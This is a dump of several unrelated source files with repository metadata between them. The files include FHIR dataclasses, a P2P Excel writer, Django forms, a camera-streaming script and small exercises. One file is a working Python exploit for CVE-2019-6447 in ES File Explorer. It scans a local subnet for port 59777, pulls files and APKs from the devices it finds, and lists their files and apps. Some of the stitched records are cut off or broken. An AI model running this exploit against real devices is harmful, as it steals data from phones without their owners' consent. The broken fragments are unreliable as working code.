from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
practitioner to practice medicine within a certian locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js | [
"solbrig@jhu.edu"
] | solbrig@jhu.edu |
2b8dd5bdb40140038d3c5cfc75768d15b7d1ebe5 | 61a88248ddc7adb5036d1bb6b9892ae27d1934bb | /CVE-2019-6447_ESFileExplorer/sun.py | 19bea5499c448e560e4bbc8808a50630cd5c2008 | [] | no_license | sunSUNQ/Java_learning | 146e547da90adf7056cdf49888caddaa30644d78 | 4e10e00c8bd0fa6f24ced1a36eef327f379fa25c | refs/heads/master | 2022-04-30T04:40:05.517594 | 2022-04-06T12:37:54 | 2022-04-06T12:37:54 | 176,905,685 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,643 | py | import json
import optparse
import requests
import sys
from socket import *
verbose = True
def sanitize_json(json):
json = json.replace("\'", "\"")
json = json.split('[')[1].split(']')[0]
json = json[0:len(json)-6] + "}"
return json
def get_file(addr, filepath):
if verbose:
print('[*] Getting file: ' + filepath + '\n\tfrom: ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777' + filepath
filename = filepath.rsplit('/', 1)[1]
resp = session.get(address, headers=headers, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if resp and resp.status_code == 200:
if verbose:
print('[*] Writing to file: ' + filename)
with open(filename, 'wb') as f:
f.write(resp.content)
def execute_cmd(addr, cmd, package):
if verbose:
print('[*] Executing command: ' + cmd + ' on ' + addr)
session = requests.Session()
headers = {"Content-Type": "application/json"}
address = 'http://' + addr + ':59777'
if package != '':
data = '{ "command":' + cmd + ', "appPackageName":' + package + ' }'
else:
data = '{ "command":' + cmd + ' }'
resp = session.post(address, headers=headers, data=data, verify=False)
if verbose:
print('[*] Server responded with: ' + str(resp.status_code))
if "NameNotFoundException" in resp.text:
print('[!] Package \'' + package + '\' not found!')
return
if cmd not in ('getDeviceInfo', 'appLaunch', 'listAppsSdcard', 'listVideos', 'listFiles'):
text = sanitize_json(resp.text)
else:
text = resp.text
if resp and resp.status_code == 200:
if cmd == 'getAppThumbnail':
if verbose:
print('[*] Getting app thumbnail: ' + package)
with open(package + ".jpg", 'wb') as f:
f.write(resp.content)
elif cmd == 'appPull':
if verbose:
print('[*] Pulling app: ' + package)
with open(package + ".apk", 'wb') as f:
f.write(resp.content)
else:
print(text)
def is_up(addr):
s = socket(AF_INET, SOCK_STREAM)
s.settimeout(1)
if not s.connect_ex((addr, 59777)):
s.close()
return 1
else:
s.close()
def show_available_cmds():
print('')
print('######################')
print('# Available Commands #')
print('######################')
print('')
print('listFiles: List all the files')
print('listPics: List all the pictures')
print('listVideos: List all the videos')
print('listAudios: List all the audio files')
print('listApps: List all the apps installed')
print('listAppsSystem: List all the system apps')
print('listAppsPhone: List all the phone apps')
print('listAppsSdcard: List all the apk files in the sdcard')
print('listAppsAll: List all the apps installed (system apps included)')
print('getDeviceInfo: Get device info. Package name parameter is needed')
print('appPull: Pull an app from the device')
print('appLaunch: Launch an app. Package name parameter is needed')
print('getAppThumbnail: Get the icon of an app. Package name parameter is needed')
print('')
def set_up_menu():
    """Build the command-line parser and return (options, args) for sys.argv."""
    parser = optparse.OptionParser()
    # (flags, dest, help text, default) for every value-taking option.
    value_options = (
        (('-g', '--get-file'), 'filepath', 'Get file path', ''),
        (('-c', '--cmd'), 'cmd', 'Command to execute', ''),
        (('-p', '--pkg'), 'package', 'Package name', ''),
        (('--ip', '--host'), 'host', 'Target host IP', ''),
        (('-n', '--network'), 'network', 'Network to scan', '192.168.0.'),
    )
    for flags, dest, help_text, default in value_options:
        parser.add_option(*flags, action='store', dest=dest,
                          help=help_text, default=default)
    # Boolean flag: turns on verbose progress output.
    parser.add_option('-v', '--verbose',
                      action='store_true', dest='verb',
                      help='Loud stdout')
    return parser.parse_args()
def main():
    """CLI entry point: dispatch to help, single-host or subnet-sweep mode."""
    options, _ = set_up_menu()
    verbose = options.verb

    def scan_host(addr):
        # Probe one address; if the service answers, run the requested action.
        if verbose:
            print('[*] Checking address: ' + addr)
        if not is_up(addr):
            return
        if verbose:
            print('[+] Address is up: ' + addr)
        if options.filepath != '':
            get_file(addr, options.filepath)
        elif options.cmd != '':
            execute_cmd(addr, options.cmd, options.package)

    if len(sys.argv) > 1 and sys.argv[1] == 'list':
        show_available_cmds()
    elif options.filepath != '' or options.cmd != '':
        if options.host != '':
            scan_host(options.host)
        else:
            # No explicit host given: sweep the whole /24.
            for last_octet in range(0, 255):
                scan_host(options.network + str(last_octet))
    else:
        usage = (
            'Usage:',
            '- python3 poc.py list',
            '- python3 poc.py --get-file [filepath]',
            '- python3 poc.py --cmd [cmd]',
            '- python3 poc.py --cmd [cmd] --host [target_host]',
            '- python3 poc.py --cmd [cmd] --network [network]',
            '- python3 poc.py --cmd [cmd] --pkg [package_name]',
            '- python3 poc.py --verbose --cmd [cmd] --pkg [package_name]',
        )
        for line in usage:
            print(line)


if __name__ == '__main__':
    main()
"451953080@qq.com"
] | 451953080@qq.com |
5d5aecd5c82c43bb17695dc4f8426397cc2fd056 | d0ddcd54e19f6f8a3702a0ff9611bf2b92092264 | /task5.py | 0715f4c1c9d3c3937c6f79b3a6b59290dff6ad59 | [] | no_license | altynai02/Chapter2-Task5-hackerrank | 60ec80b5ba1e12e221c4bbe47e115e1a3e5c76cf | ca58a85f28b2226d67989c6ec30dafae9ac52c0a | refs/heads/master | 2021-03-12T12:44:09.103786 | 2020-03-11T16:24:33 | 2020-03-11T16:24:33 | 246,622,043 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 183 | py | #Hackerrank Two Strings
def twoStrings(s1, s2):
s1 = set(s1)
s2 = set(s2)
if len(s1.intersection(s2)) == 0:
return "NO"
else:
return "YES"
twoStrings() | [
"altynay.bakytbekova.02@gmal.com"
] | altynay.bakytbekova.02@gmal.com |
5931821dc074aa8a3ba849f7d1c6bb9a74fdb60f | ff7a7ae752a0c4383841f78b384d1d4be24bc90e | /manipulacion3.py | 3c7963e272af0ed3af7b3e0fb8fa418cd086ef25 | [] | no_license | FranciscoJavierVH/Scripts-pyhon-crash-course | 2b779517d995c11a09454259cfcfc0d1922f12ea | 657baaa204a4272dd5ba717728c5b1672de733e1 | refs/heads/master | 2020-05-31T21:56:18.859872 | 2019-06-06T03:57:42 | 2019-06-06T03:57:42 | 190,509,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34 | py | robot = 'nomad'
robot[:3]
#'nom'
| [
"FranciscoJavierVH"
] | FranciscoJavierVH |
0dea1b7908aef2c8f3b06733aae8c79b441e193c | c8ec5f93927b2af2bf662909fcc87662a21d2e6d | /wallet/__init__.py | 8ee19013469e810ec2fefe606217fc9515b2bab0 | [] | no_license | arkadiusznowak1983/python_cryptocurrency | bee0e7b90fa653fa48648c76463545a5c288bc57 | bb4c4fa3fa3d020972f6c7d6810a41ab9e259f15 | refs/heads/master | 2022-12-02T21:02:39.947503 | 2020-08-23T04:51:31 | 2020-08-23T04:51:31 | 270,490,748 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | #__all__ = [ "Wallet" ] | [
"arkadiusz.nowak1983@gmail.com"
] | arkadiusz.nowak1983@gmail.com |
f48415a5c7c97a2d46bf446ff65d3dd864d9f6c9 | 4e3964ae68b0ee452b6aa4a24956526b905379c7 | /spec_metod_class.py | 371c182d356a5d2962876aeed6c2ab76fed9ad91 | [] | no_license | alexandervin/Python | 9a9e26234050ee4a640f79dcdddae05b2683616d | 6b989ac232960aebfe30f1927f2c9090850f21a3 | refs/heads/master | 2020-12-21T16:39:16.048358 | 2020-04-03T08:12:41 | 2020-04-04T09:33:11 | 236,492,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 575 | py | class Backpak:
def __init__(self, gift=None):
self.content = []
if gift is not None:
self.content.append(gift)
def add(self, item):
self.content.append(item)
print('В рюкзак положили:', item)
def inspect(self):
print('В рюкзаке лежит')
for item in self.content:
print('------', item)
# Demo: start with a pen as a gift, add three more items, then list everything.
my_backpack = Backpak(gift='ручка')
my_backpack.add(item='ноут')
my_backpack.add(item='зарядка')
my_backpack.add(item='флэшка')
my_backpack.inspect()
| [
"alexander.vinitsky@gmail.com"
] | alexander.vinitsky@gmail.com |
ad8cef6ac7f0d1ea9ccd700614612c7513fbf724 | 035591f566ce5d46c246bb92d7b4e029fd6d16e6 | /OnlineJudges/CodeForces/B. Table Tennis.py | 7e26a07479e1c615a9b21838beac4e2c2dc74ff3 | [] | no_license | EduardoMCF/Competitive-Programming | 92243fa202d5ef592092683879de191e15340dbb | 4f6ff1ffec46a52049257bdd380c2ed29b8672fd | refs/heads/master | 2020-03-25T20:02:00.100212 | 2019-07-20T10:27:34 | 2019-07-20T10:27:34 | 144,111,733 | 0 | 0 | null | 2018-10-31T20:34:19 | 2018-08-09T06:45:25 | Python | UTF-8 | Python | false | false | 400 | py | n,k = map(int,raw_input().split())
e = map(int,raw_input().split())
M = max(e)
if k >= n:print M
else:
for i in xrange(n):
c, a, achou = 0, 1, False
if e[i] == M:
print M
break
while e[i] >= e[i+a]:
if i+a == n:a = 0
a+=1
c+=1
if c == k:
achou=True
break
if achou:
print e[i]
break | [
"eduardo.freitas@ccc.ufcg.edu.br"
] | eduardo.freitas@ccc.ufcg.edu.br |
7284fd4300a654751a4c16e388ff4ca1012d1c03 | 9351264d05177646a8b940aef42d46521e7cdeed | /easyp2p/excel_writer.py | 326ed1718eb257a4be8754fda5b049e8817799d5 | [
"MIT"
] | permissive | mohabouje/easyp2p | aebb919d316d6064345017c90dba02dec57ce25d | 2638afff21f8a0627a78f19ae4ccc3939b5d46e6 | refs/heads/master | 2022-09-24T04:47:42.229297 | 2020-06-05T10:16:29 | 2020-06-05T10:16:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,489 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2018-2020 Niko Sandschneider
"""
Module for writing parsed account statements of P2P platforms to Excel.
The combined parsed results of all selected P2P platforms will be written to
an Excel file with three worksheets: daily results, monthly results and total
results for the whole date range.
"""
import calendar
from datetime import date, timedelta
import logging
from typing import Callable, Dict, List, Optional, Sequence, Tuple
import pandas as pd
from PyQt5.QtCore import QCoreApplication
from easyp2p.p2p_signals import Signals
from easyp2p.p2p_parser import P2PParser
_translate = QCoreApplication.translate
logger = logging.getLogger('easyp2p.excel_writer')
DAILY_RESULTS = _translate('excel_writer', 'Daily results')
MONTHLY_RESULTS = _translate('excel_writer', 'Monthly results')
TOTAL_RESULTS = _translate('excel_writer', 'Total results')
# Signals for communicating with the GUI
signals = Signals()
@signals.update_progress
def write_results(
        df_result: pd.DataFrame, output_file: str,
        date_range: Tuple[date, date]) -> bool:
    """
    Write daily, monthly and total investment results to an Excel file.

    Args:
        df_result: DataFrame containing parsed account statements for all
            selected P2P platforms.
        output_file: File name including path where to save the Excel file.
        date_range: Date range (start_date, end_date) for which the account
            statement was generated.

    Returns:
        True on success, False on failure.

    Raises:
        RuntimeError: If date, platform or currency column are missing
            in df_result.
    """
    if df_result.empty:
        # Nothing was parsed at all; there is nothing to write.
        logger.info('df_result is empty.')
        return False

    # Work on a copy so the caller's DataFrame stays untouched.
    df_result = df_result.copy()
    df_result.reset_index(inplace=True)

    # All three index columns are mandatory for the pivots below.
    for column in (P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.DATE):
        if column not in df_result.columns:
            raise RuntimeError(
                _translate(
                    'excel_writer', 'Writing results to Excel was not '
                    f'successful! Column {column} is missing!'))

    # Normalize the date column and derive a month period column from it.
    df_result[P2PParser.DATE] = pd.to_datetime(
        df_result[P2PParser.DATE], format='%Y-%m-%d')
    df_result[P2PParser.MONTH] = pd.to_datetime(
        df_result[P2PParser.DATE], format='%d.%m.%Y').dt.to_period('M')

    # Aggregate the statement on three levels of granularity.
    df_daily = _get_daily_results(df_result)
    df_monthly = _get_monthly_results(df_result, date_range)
    df_total = _get_total_results(df_monthly)

    # One worksheet per aggregation level.
    with pd.ExcelWriter(
            output_file, datetime_format='DD.MM.YYYY',
            engine='xlsxwriter') as writer:
        for sheet_name, frame in (
                (DAILY_RESULTS, df_daily),
                (MONTHLY_RESULTS, df_monthly),
                (TOTAL_RESULTS, df_total)):
            _write_worksheet(writer, sheet_name, frame)

    return True
def _get_daily_results(df_result: pd.DataFrame) -> pd.DataFrame:
    """
    Build the per-day view: one row per (platform, currency, date).

    Args:
        df_result: DataFrame containing parsed account statements for all
            selected P2P platforms.

    Returns:
        DataFrame with the daily results.
    """
    daily = df_result.copy()
    # The month column only matters for the monthly aggregation.
    daily = daily.drop(columns=P2PParser.MONTH)
    daily = daily.set_index(
        [P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.DATE])
    return daily.sort_index()
def _get_monthly_results(
        df_result: pd.DataFrame, date_range: Tuple[date, date]) -> pd.DataFrame:
    """
    Build the per-month view, including zero rows for months without
    any cash flows.

    Args:
        df_result: DataFrame containing parsed account statements for all
            selected P2P platforms.
        date_range: Date range for displaying monthly results.

    Returns:
        DataFrame with the monthly results.
    """
    # Pivot on platform/currency/month over all known target columns.
    value_columns = [
        col for col in P2PParser.TARGET_COLUMNS if col in df_result.columns]
    monthly = df_result.pivot_table(
        values=value_columns,
        index=[P2PParser.PLATFORM, P2PParser.CURRENCY, P2PParser.MONTH],
        aggfunc=_get_aggfunc(value_columns))
    return _add_months_without_cashflows(monthly, date_range)
def _get_total_results(df_monthly: pd.DataFrame) -> pd.DataFrame:
    """
    Build the overall totals per (platform, currency), plus one synthetic
    'Total' row per currency summed over all platforms.

    Args:
        df_monthly: DataFrame containing monthly results.

    Returns:
        DataFrame with the total results.
    """
    value_columns = [
        col for col in P2PParser.TARGET_COLUMNS if col in df_monthly.columns]
    # Collapse the month level away.
    totals = df_monthly.pivot_table(
        values=value_columns,
        index=[P2PParser.PLATFORM, P2PParser.CURRENCY],
        aggfunc=_get_aggfunc(value_columns),
        dropna=False)

    # Append a 'Total' pseudo-platform summing every real platform
    # per currency.
    per_currency = totals.reset_index().set_index(P2PParser.CURRENCY)
    per_currency = per_currency.groupby(P2PParser.CURRENCY).sum()
    per_currency[P2PParser.PLATFORM] = 'Total'
    per_currency = per_currency.reset_index().set_index(
        [P2PParser.PLATFORM, P2PParser.CURRENCY])

    combined = totals.append(per_currency, sort=True)
    return combined.dropna(how='all')
def _get_aggfunc(columns: Sequence[str]) -> Dict[str, Callable]:
    """
    Map each column to the aggregation function used in the pivot tables.

    Balance columns keep the first (start) or last (end) entry per group;
    every other column is summed, but only when at least one value is
    present so all-NaN groups stay NaN instead of becoming 0.

    Returns:
        Dictionary where columns are the keys and the aggregation function
        are the values.
    """
    def _first(series):
        return series.iloc[0]

    def _last(series):
        return series.iloc[-1]

    def _sparse_sum(series):
        # min_count=1: an all-NaN group yields NaN, not 0.
        return series.sum(min_count=1)

    aggfunc: Dict[str, Callable] = {}
    for col in columns:
        if col == P2PParser.START_BALANCE_NAME:
            aggfunc[col] = _first
        elif col == P2PParser.END_BALANCE_NAME:
            aggfunc[col] = _last
        else:
            aggfunc[col] = _sparse_sum
    return aggfunc
def _add_months_without_cashflows(
        df: pd.DataFrame, date_range: Tuple[date, date]) -> pd.DataFrame:
    """
    Add a zero line for all months in date_range without cash flows.

    Args:
        df: DataFrame which should be checked for missing months.
        date_range: Date range.

    Returns:
        Input DataFrame with zero lines appended for each month without
        cash flows.
    """
    months = get_list_of_months(date_range)
    # For each platform/currency combination we expect one row per month
    # in date_range
    expected_rows = sorted(list(set(
        (index[0], index[1], i) for index in df.index for i in range(
            len(months)))))
    for platform, currency, i in expected_rows:
        month = pd.Period(freq='M', year=months[i].year, month=months[i].month)
        if (platform, currency, month) not in df.index:
            # Month has no cash flows: only fill columns with non-N/A
            # values, so columns that are N/A for this platform stay N/A.
            fill_columns = df.loc[platform].dropna(axis=1).columns
            df.loc[(platform, currency, month), fill_columns] = 0.
            # Zero is not necessarily correct for the balance columns
            if {P2PParser.START_BALANCE_NAME,
                    P2PParser.END_BALANCE_NAME}.issubset(df.columns):
                if i > 0:
                    # Carry the previous month's end balance forward.
                    previous_month = pd.Period(
                        freq='M', year=months[i - 1].year,
                        month=months[i - 1].month)
                    balance = _get_balance_for_months_without_cashflows(
                        df, platform, currency, previous_month)
                else:
                    # First month of the range: borrow the earliest known
                    # start balance instead.
                    balance = _get_balance_for_months_without_cashflows(
                        df, platform, currency)
                df.loc[
                    (platform, currency, month),
                    P2PParser.START_BALANCE_NAME] = balance
                df.loc[
                    (platform, currency, month),
                    P2PParser.END_BALANCE_NAME] = balance
    df.sort_index(inplace=True)
    return df
def _get_balance_for_months_without_cashflows(
        df: pd.DataFrame, platform: str, currency: str,
        previous_month: Optional[pd.Period] = None):
    """
    Look up the balance to assign to a month without any cash flows.

    Args:
        df: Monthly results DataFrame indexed by (platform, currency, month).
        platform: Platform for which the balance is looked up.
        currency: Currency for which the balance is looked up.
        previous_month: Month immediately before the empty one, or None if
            the empty month is the first month of the date range.

    Returns:
        Balance used for both start and end balance of the empty month.
    """
    if previous_month:
        # If month is not the first month look up the correct value in
        # previous month's row
        balance = (
            df.loc[
                (platform, currency, previous_month),
                P2PParser.END_BALANCE_NAME])
    else:
        # If month is the first month look up the correct value in the
        # first existing month's row. If no month has cash flows assume
        # that balance=0.
        # NOTE(review): next_months collects month entries across *all*
        # platform/currency combinations in df, not just (platform,
        # currency) — confirm the first index entry always belongs to the
        # combination being filled.
        next_months = [index[2] for index in df.index]
        if next_months:
            balance = (
                df.loc[
                    (platform, currency, next_months[0]),
                    P2PParser.START_BALANCE_NAME])
        else:
            balance = 0
    return balance
def get_list_of_months(date_range: Tuple[date, date]) -> List[date]:
    """
    Return one date per month in *date_range*.

    Starting at the range's first day, repeatedly jump forward by the
    number of days in the current month until the end date is passed.

    Args:
        date_range: Date range.

    Returns:
        List of all months in date_range.
    """
    months: List[date] = []
    cursor = date_range[0]
    while cursor < date_range[1]:
        months.append(cursor)
        # Advance by exactly the length of the current month.
        _, days_in_month = calendar.monthrange(cursor.year, cursor.month)
        cursor += timedelta(days=days_in_month)
    return months
def _write_worksheet(
        writer: pd.ExcelWriter, worksheet_name: str, df: pd.DataFrame) -> None:
    """
    Write DataFrame to Excel worksheet and format columns.

    For each column in the worksheet the width is set to the maximum length
    * 1,2 of all entries in the column. For all non-index columns the_format
    is set to money_format.

    Args:
        writer: Handle of pandas ExcelWriter.
        worksheet_name: Name of the worksheet where DataFrame should be
            saved.
        df: DataFrame containing the data to be written to the worksheet.
    """
    # Rounds results to 2 digits, sort columns and fill in missing values
    df = df.round(2)
    df = df[[
        column for column in P2PParser.TARGET_COLUMNS
        if column in df.columns]]
    df.fillna('N/A', inplace=True)
    # Define format for currency columns
    workbook = writer.book
    money_format = workbook.add_format({'num_format': '#,##0.00'})
    df.to_excel(writer, worksheet_name)
    # Format cells and set column widths
    worksheet = writer.sheets[worksheet_name]
    # Columns left of index_length are index columns (plain format); the
    # rest are value columns and get the money format.
    index_length = len(df.index.names)
    df = df.reset_index()
    for index, col in enumerate(df.columns):
        # Get length of header and longest data entry
        header_length = len(col)
        data_length = df[col].map(lambda x: len(str(x))).max()
        if index < index_length:
            # Factor 1.2 adds a little breathing room around the text.
            worksheet.set_column(
                index, index, max(header_length, data_length) * 1.2)
        else:
            worksheet.set_column(
                index, index, max(header_length, data_length) * 1.2,
                money_format)
"info@ceystyle.de"
] | info@ceystyle.de |
5e9f086b3ccb094d9cb17200c2359b059c27f5a1 | e2017e4faa661c13bfeb6ee6f4b3196531555bdd | /polls/migrations/0001_initial.py | 0f0d7838730d614c476b6fb7b9972de37de0d6c5 | [] | no_license | kchar808/mysite | a05a31516846a4537c25e51366c50d7ef6d27fc3 | 721fdf827cf026d15b2b5822eea02ba2ff68526c | refs/heads/master | 2022-04-07T15:35:27.378608 | 2020-01-12T03:49:38 | 2020-01-12T03:49:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | # Generated by Django 3.0.2 on 2020-01-09 02:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for the polls app: creates Question and Choice.

    Auto-generated by ``manage.py makemigrations``; Django tracks this file
    by name, so avoid edits beyond comments.
    """

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('question_text', models.CharField(max_length=200)),
                ('pub_date', models.DateTimeField(verbose_name='date published')),
            ],
        ),
        migrations.CreateModel(
            name='Choice',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('choice_text', models.CharField(max_length=200)),
                ('votes', models.IntegerField(default=0)),
                # Each Choice belongs to one Question; deleting the
                # Question cascades to its Choices.
                ('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Question')),
            ],
        ),
    ]
| [
"keelanachar@gmail.com"
] | keelanachar@gmail.com |
168bf31505f3734798a9e55c48d2ab1a8755243b | f876ec2849956c52082aa43d12241850c5942a3b | /dashboard/forms.py | a4e676500cdb13813f887f6c63d898b6bf07e099 | [] | no_license | osdesignweb-company/dsc_v2 | 6afce7d674f1168e017fc0a716dcdf589bf46b12 | d2709841ffb9a6d34fde5a10e08d86863df98edb | refs/heads/master | 2020-04-14T09:52:15.984790 | 2019-01-21T17:00:14 | 2019-01-21T17:00:14 | 163,771,570 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,023 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib.auth import get_user_model
from django.views.generic.edit import UpdateView
from django.urls import reverse
from builtins import super
class UserCreationForm(forms.ModelForm):
    """Registration form: profile fields plus a double-entry password.

    The password is collected twice (password1/password2) and stored
    hashed via ``set_password`` in :meth:`save`.
    """

    # id_persona = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'N° Documento'}))
    nombre = forms.CharField(required=True)
    primer_apellido = forms.CharField(required=True)
    password1 = forms.CharField(label='Password', min_length=8, widget=forms.PasswordInput)
    password2 = forms.CharField(label='Password confirmation', min_length=8, widget=forms.PasswordInput)

    class Meta:
        model = get_user_model()
        fields = ('id_persona','nombre','primer_apellido','segundo_apellido',
            'tipo_documento','rol','sexo','correo','celular','telefono',
            'pais_nacimiento','imagen','fecha_nacimiento',
            )

    def clean_password2(self):
        # Check that the two password entries match
        password1 = self.cleaned_data.get("password1")
        password2 = self.cleaned_data.get("password2")
        if password1 and password2 and password1 != password2:
            raise forms.ValidationError("Contraseñas no coinciden")
        return password2

    def save(self, commit=True):
        # Save the provided password in hashed format
        user = super().save(commit=False)
        user.set_password(self.cleaned_data["password1"])
        if commit:
            user.save()
        return user
class UserUpdateForm(forms.ModelForm):
    """Profile edit form: same fields as registration, minus the password."""

    class Meta:
        model = get_user_model()
        fields = (
            'id_persona','nombre','primer_apellido','segundo_apellido',
            'tipo_documento','rol','sexo','correo','celular','telefono',
            'pais_nacimiento','imagen','fecha_nacimiento',
            )

    def save(self, commit=True):
        # Persist only when commit=True; callers may defer saving.
        user = super().save(commit=False)
        if commit:
            user.save()
        return user
"sabnq@hotmail.com"
] | sabnq@hotmail.com |
91b92aca71f5a39a7f0825e9c4feb052b3573455 | f5baae2f56a22d6e7b23b121eae1dd4751564101 | /Embedded/Satellite/VideoStreamEmbedded.py | f03bac2f3e4c55c73d77eb9810fb20b0685203be | [] | no_license | BaekCHO/Embedded | 50d673a0cead437114e0a0ecf6733dd2ec5351b3 | 164fe732acf0d8b6bb76688f9855e06f24fa1404 | refs/heads/master | 2016-09-13T21:12:58.926047 | 2016-06-12T01:37:24 | 2016-06-12T01:37:24 | 57,861,475 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | import cv2, cv
import socket
import threading
import time
import TotalFunc
sendImg = ""
def getPhoto():
    """Grab frames forever from camera 0 at 320x240 and keep the latest
    frame, JPEG-encoded, in the module-global ``sendImg``."""
    global sendImg
    cam = cv2.VideoCapture(0)
    cam.set(cv.CV_CAP_PROP_FRAME_WIDTH, 320)
    cam.set(cv.CV_CAP_PROP_FRAME_HEIGHT, 240)
    while True:
        ret, img = cam.read()
        # Encode in memory; sendPhoto() ships this string over TCP.
        sendImg = cv2.imencode(".jpeg", img)[1].tostring()
        # waitKey lets OpenCV's event loop run (~10 ms between frames).
        key = cv2.waitKey(10)
def sendPhoto():
    """Repeatedly connect to the ground station and send the latest JPEG
    frame followed by the TotalFunc sensor readings."""
    global sendImg
    port = 8000
    while True:
        # NOTE(review): one fresh TCP connection per frame; the receiver
        # presumably treats connection close as end-of-message — confirm.
        s = socket.socket()
        s.connect(("113.198.235.230", port))
        # print "Sending..."
        s.send(sendImg)
        s.send(str(TotalFunc.temp))
        s.send(str(TotalFunc.high))
        s.send(str(TotalFunc.altitude))
        # print "Sending is finished"
        # Clear so the same frame is not re-sent before a new capture.
        sendImg = ""
        s.close()
if __name__ == "__main__":
    # Spawn one daemon-less worker thread per task: camera capture,
    # network upload, video recording and the TotalFunc sensor loops.
    #try:
    th = threading.Thread(target = getPhoto)
    th.start()
    th2 = threading.Thread(target = sendPhoto)
    th2.start()
    th3 = threading.Thread(target = TotalFunc.save_Video)
    th3.start()
    th4 = threading.Thread(target = TotalFunc.mix_Db_Measure)
    th4.start()
    th5 = threading.Thread(target = TotalFunc.find_Gps)
    th5.start()
    #finally
    #TotalFunc.db_Select()
    #create_Graph()
| [
"noreply@github.com"
] | BaekCHO.noreply@github.com |
b767dc6912417be37cab9363e2fe281e20c8e20d | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_lookouts.py | 435d7553390587072a7651b0c3278816d229a48a | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 245 | py |
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
# class header
class _LOOKOUTS(_LOOKOUT, ):
    """Auto-generated word entry for the plural noun "lookouts"."""
    def __init__(self,):
        _LOOKOUT.__init__(self)
        self.name = "LOOKOUTS"
        self.specie = 'nouns'
        self.basic = "lookout"
        self.jsondata = {}
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
78071721fe276178f2b4e561bfc8ddeb56ab6e32 | a71b1c2cf1ff5b4d8bb781af7c550d4389550553 | /miwc/urls.py | 2ad48a1191f3e52976970b6200e30c2f9fc9baf2 | [] | no_license | water1e6/miwc | c9caff26f20f4fbf57ae82605e9bb31c66a0b27f | 0e238dd4532ff9e46a7be4ab7160e88a3ba423fc | refs/heads/master | 2021-03-30T18:31:57.090431 | 2016-01-11T07:16:59 | 2016-01-11T07:16:59 | 24,247,602 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | from django.conf.urls import patterns, include, url
# Uncomment the next two lines to enable the admin:
from django.contrib import admin
urlpatterns = [
    # Examples:
    # url(r'^miwc/', include('miwc.foo.urls')),
    # Uncomment the admin/doc line below to enable admin documentation:
    # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
    # url(r'^site/', include('website.urls', namespace="site")),
    # Uncomment the next line to enable the admin:
    url(r'^admin/', include(admin.site.urls)),
    # Site root delegates to the website app's URLconf.
    # NOTE(review): include() behind r'^$' only matches the bare root —
    # confirm sub-URLs of website.urls are actually reachable.
    url(r'^$', include('website.urls', namespace='site')),
]
"shane@mercerislandwater.com"
] | shane@mercerislandwater.com |
1288d48538f1f10e128e1a615ca9175f62cd2f1f | ea1ec2d938d4b76d6dd83d28a66963dd504e99d5 | /deployment_pipeline/app.py | 8e5f19f222aad470ffcc8ae26102af2c530d11d1 | [
"MIT-0"
